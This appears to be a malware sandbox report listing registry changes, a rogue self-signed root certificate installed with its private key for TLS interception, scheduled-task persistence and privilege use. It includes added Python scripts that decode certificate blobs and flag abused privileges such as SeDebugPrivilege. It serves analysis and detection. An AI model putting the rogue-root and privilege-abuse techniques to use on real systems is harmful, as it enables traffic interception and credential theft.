\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0\0\NodeSlot = "11" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 
00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 
00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings 
chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\NodeSlot = "7" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local 
Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents" chrome.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 Organizational.pif Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0
616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a Organizational.pif Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 buildred.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 
0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528
858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 buildred.exe -
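The two Blob values above are not opaque. Their layout is a run of records, each a property id (u32 LE), a reserved u32 equal to 1, a length (u32 LE) and the data; property 11 is the friendly name (UTF-16LE), 3 the SHA-1 thumbprint, 2 a CRYPT_KEY_PROV_INFO structure and 32 the DER certificate. Read that way, the AuthRoot record written by Organizational.pif is the DigiCert High Assurance EV Root CA (friendly name "DigiCert", thumbprint 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25, matching its key name), the kind of entry the automatic root update creates when a process builds a chain, so it is unremarkable. The ROOT record written by buildred.exe is not: its friendly name is "Titanium Root Certificate Authority", the certificate is self-signed (issuer and subject are both CN=Titanium Root Certificate Authority), valid from 2023-03-14 to 2026-06-17, with a 2048-bit RSA key, basicConstraints CA:TRUE and an extended key usage of serverAuth, and the blob carries a key-provider record (container {41744BE4-11C5-494C-A213-BA0CE944938E} in "Microsoft Enhanced Cryptographic Provider v1.0"), meaning the store also knows a private key for it. A trusted root whose private key sits on the victim host is what TLS interception of local browser traffic requires. The parser below is an added example, not the report's or any vendor's code. Because the report wraps the hex across lines, its inline test blob is constructed with the same record layout from the values decoded above rather than copied byte for byte, and a record cut short by page wrapping is reported as truncated instead of failing.

```python
"""Decode SystemCertificates\\...\\Certificates\\<thumbprint>\\Blob registry values."""
import hashlib
import re
import struct

# CryptoAPI property ids that appear in store blobs (wincrypt.h values).
CERT_KEY_PROV_INFO_PROP_ID = 2
CERT_SHA1_HASH_PROP_ID = 3
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_CERT_PROP_ID = 32


def build_blob(records):
    """Serialise [(prop_id, data_bytes), ...] in store-blob layout."""
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in records)


def parse_blob(blob):
    """Walk the records; return ({prop_id: data}, truncated_prop_id_or_None).
    A record whose declared length runs past the end of the data is kept as far
    as it goes and reported, because report pages wrap and cut these values."""
    props, off, truncated = {}, 0, None
    while off + 12 <= len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        if reserved != 1:
            raise ValueError(f"not a certificate store blob: reserved={reserved} at offset {off + 4}")
        off += 12
        if off + length > len(blob):
            props[prop_id], truncated = blob[off:], prop_id
            break
        props[prop_id] = blob[off:off + length]
        off += length
    return props, truncated


def _utf16z(buf, off=0):
    """UTF-16LE string starting at buf[off], up to its null terminator."""
    return buf[off:].decode("utf-16-le", errors="ignore").split("\x00", 1)[0]


def key_prov_info(data):
    """CRYPT_KEY_PROV_INFO as stored: the first two u32 are offsets (from the start
    of the record data) of the container name and provider name strings."""
    container_off, provider_off = struct.unpack_from("<II", data, 0)
    return {"container": _utf16z(data, container_off), "provider": _utf16z(data, provider_off)}


def describe(key_name, blob):
    """Analyst summary of one Certificates\\<key_name>\\Blob value."""
    props, truncated = parse_blob(blob)
    der = props.get(CERT_CERT_PROP_ID)
    info = {
        "friendly_name": _utf16z(props[CERT_FRIENDLY_NAME_PROP_ID]) if CERT_FRIENDLY_NAME_PROP_ID in props else None,
        "recorded_sha1": props[CERT_SHA1_HASH_PROP_ID].hex() if CERT_SHA1_HASH_PROP_ID in props else None,
        # A key-provider record means the store also knows a private key for this
        # certificate, which an imported third-party root never has.
        "private_key": key_prov_info(props[CERT_KEY_PROV_INFO_PROP_ID]) if CERT_KEY_PROV_INFO_PROP_ID in props else None,
        "truncated_property": truncated,
        "der_length": len(der) if der else 0,
        "computed_sha1": None,
        "thumbprint_matches_key": None,
        "validity": None,
    }
    if der and truncated != CERT_CERT_PROP_ID:
        # The key name under Certificates\ is the SHA-1 of the DER certificate.
        info["computed_sha1"] = hashlib.sha1(der).hexdigest()
        info["thumbprint_matches_key"] = info["computed_sha1"] == key_name.lower()
    if der:
        # X.509 validity is two UTCTime values (tag 0x17, length 13, "YYMMDDhhmmssZ");
        # pulling them by pattern avoids needing an ASN.1 library here.
        times = re.findall(rb"\x17\x0d(\d{12}Z)", der)
        if len(times) >= 2:
            info["validity"] = (times[0].decode(), times[1].decode())
    return info


# Constructed test blob: the strings are the ones decoded from the report's
# buildred.exe record; the certificate bytes are a stand-in (not a real DER
# certificate) that only carries the two UTCTime fields found in the real one.
STAND_IN_DER = (b"\x30\x82\x03\x06 constructed stand-in "
                + b"\x30\x1e\x17\x0d230314103520Z\x17\x0d260617103520Z")
_guid = "{41744BE4-11C5-494C-A213-BA0CE944938E}\x00".encode("utf-16-le") + b"\x00\x00"
_prov = "Microsoft Enhanced Cryptographic Provider v1.0\x00".encode("utf-16-le") + b"\x00\x00"
# Header of the stored structure as in the report: two string offsets, provider
# type 1, flags 0, no provider params, key spec 1; then the two strings.
KEY_PROV_INFO = struct.pack("<IIIIIII", 28, 28 + len(_guid), 1, 0, 0, 0, 1) + _guid + _prov
TEST_THUMBPRINT = hashlib.sha1(STAND_IN_DER).hexdigest().upper()
TEST_BLOB = build_blob([
    (CERT_FRIENDLY_NAME_PROP_ID, "Titanium Root Certificate Authority\x00".encode("utf-16-le")),
    (CERT_KEY_PROV_INFO_PROP_ID, KEY_PROV_INFO),
    (CERT_SHA1_HASH_PROP_ID, bytes.fromhex(TEST_THUMBPRINT)),
    (CERT_CERT_PROP_ID, STAND_IN_DER),
])

if __name__ == "__main__":
    print(describe(TEST_THUMBPRINT, TEST_BLOB))
    print(describe(TEST_THUMBPRINT, TEST_BLOB[:-40]))  # same value cut short, as a wrapped page would leave it
```

To run it on the report's own value, join the hex of the Blob across the wrapped lines and call `describe("F1A578C4CB5DE79A370893983FD4DA8B67B2B064", bytes.fromhex(hex_text))`; a `thumbprint_matches_key` of False then means the hex was damaged in transit, not that Windows stored a wrong hash.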
Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6612 schtasks.exe 7080 schtasks.exe 5244 schtasks.exe 5368 schtasks.exe 9644 schtasks.exe 6476 schtasks.exe 8876 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 4772 first.exe 11476 explorer.exe 5920 Update.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2212 chrome.exe 2212 chrome.exe 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 3000 Predicted.pif 5192 powershell.exe 5192 powershell.exe 5192 powershell.exe 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 5288 312026255.exe 5288 312026255.exe 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 4304 Organizational.pif 5732 powershell.exe 5732 powershell.exe 5732 powershell.exe 6080 powershell.exe 6080 powershell.exe 6080 powershell.exe 1236 powershell.exe 1236 powershell.exe 1236 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 3184 inst77player.exe 3184 inst77player.exe 5136 41986531.exe 5136 41986531.exe 1140 3036535491.exe 1140 3036535491.exe 5704 powershell.exe 5704 powershell.exe 5704 powershell.exe 1140 3036535491.exe 1140 3036535491.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 4188 chrome.exe 5476 chrome.exe 2212 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe 2212 chrome.exe -
Suspicious behavior: SetClipboardViewer 4 IoCs
pid Process 672 sysppvrdnvs.exe 5652 sysklnorbcv.exe 3196 sysmablsvr.exe 7496 sysnldcvmr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1720 4363463463464363463463463.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 
2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeDebugPrivilege 760 tasklist.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeDebugPrivilege 1132 tasklist.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeBackupPrivilege 3092 frap.exe Token: SeSecurityPrivilege 3092 frap.exe Token: SeSecurityPrivilege 3092 frap.exe Token: SeSecurityPrivilege 3092 frap.exe Token: SeSecurityPrivilege 3092 frap.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe -
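The AdjustPrivilegeToken list above is mostly noise from one browser process, with the interesting entries buried in it: the sample itself enabling SeDebugPrivilege, frap.exe enabling SeBackupPrivilege and SeSecurityPrivilege, and tasklist.exe enabling SeDebugPrivilege, which it does legitimately to enumerate every process. The script below is an added example, not the report's or any tool's code: it splits the flattened "Token: <privilege> <pid> <process>" run, counts calls per process and privilege, and reports only high-value privileges enabled by processes not expected to need them. The high-value set and the allowlist of expected pairs are this example's assumptions, and the run it parses is a constructed excerpt of the 64 records above.

```python
"""Triage of "Suspicious use of AdjustPrivilegeToken" records from a sandbox report."""
import re
from collections import defaultdict

TOKEN_RE = re.compile(r"Token:\s+(?P<priv>Se\w+Privilege)\s+(?P<pid>\d+)\s+(?P<proc>\S+)")

# Privileges that let a process read or tamper with other principals' data.
# The selection and the one-line rationale are this example's own.
HIGH_VALUE = {
    "SeDebugPrivilege": "open any process (injection, credential dumping)",
    "SeBackupPrivilege": "read any file regardless of ACL (registry hives, browser profiles)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeSecurityPrivilege": "manage the security event log and SACLs",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeTakeOwnershipPrivilege": "take ownership of objects",
    "SeImpersonatePrivilege": "impersonate clients (potato-style elevation)",
}

# (process, privilege) pairs treated as normal for that program. These are
# this example's assumptions about benign behaviour, not report data.
EXPECTED = {
    ("chrome.exe", "SeShutdownPrivilege"),
    ("chrome.exe", "SeCreatePagefilePrivilege"),
    ("tasklist.exe", "SeDebugPrivilege"),  # needed to enumerate every process
}

# Constructed excerpt of the report's flattened run (same record shape).
SAMPLE_RUN = (
    "Token: SeDebugPrivilege 1720 4363463463464363463463463.exe "
    "Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe "
    "Token: SeShutdownPrivilege 2212 chrome.exe Token: SeCreatePagefilePrivilege 2212 chrome.exe "
    "Token: SeDebugPrivilege 760 tasklist.exe "
    "Token: SeBackupPrivilege 3092 frap.exe Token: SeSecurityPrivilege 3092 frap.exe "
    "Token: SeSecurityPrivilege 3092 frap.exe Token: SeDebugPrivilege 1132 tasklist.exe"
)


def parse_tokens(text):
    """Return [(privilege, pid, process), ...] in report order. Repeats are kept:
    each record is a separate AdjustTokenPrivileges call."""
    return [(m.group("priv"), int(m.group("pid")), m.group("proc"))
            for m in TOKEN_RE.finditer(text)]


def summarize(text):
    """Map (pid, process) -> {privilege: number of calls}."""
    summary = defaultdict(lambda: defaultdict(int))
    for priv, pid, proc in parse_tokens(text):
        summary[(pid, proc)][priv] += 1
    return {key: dict(privs) for key, privs in summary.items()}


def findings(text):
    """High-value privileges enabled by processes not on the expected list, as
    (pid, process, privilege, why_it_matters) tuples in a stable order."""
    out = []
    for (pid, proc), privs in summarize(text).items():
        for priv in privs:
            if priv in HIGH_VALUE and (proc, priv) not in EXPECTED:
                out.append((pid, proc, priv, HIGH_VALUE[priv]))
    return sorted(out)


if __name__ == "__main__":
    for (pid, proc), privs in summarize(SAMPLE_RUN).items():
        print(f"{pid:>6} {proc:35} {privs}")
    print("findings:")
    for pid, proc, priv, why in findings(SAMPLE_RUN):
        print(f"  {pid} {proc}: {priv} ({why})")
```

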